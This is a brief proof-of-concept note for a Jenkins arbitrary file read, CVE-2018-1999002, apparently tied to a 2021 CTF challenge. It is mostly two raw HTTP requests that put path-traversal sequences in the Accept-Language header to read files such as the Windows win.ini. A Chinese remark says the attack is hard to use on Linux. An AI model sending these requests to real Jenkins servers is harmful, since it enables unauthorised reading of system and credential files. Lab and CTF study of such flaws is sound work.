poc
GET /plugin/credentials/.ini HTTP/1.1
Host:
Accept-Language: ../../../../../../../../windows/win
GET /plugin/credentials/.txt HTTP/1.1
Host:
Accept-Language: ../../../../../../../../firebasky
Jenkins 任意文件读取漏洞复现与分析-CVE-2018-1999002
linux 下利用难度大 必须找一个存在_的目录
https://github.com/Firebasky/ctf-Challenge/tree/main/2021_xyb_easyJenkins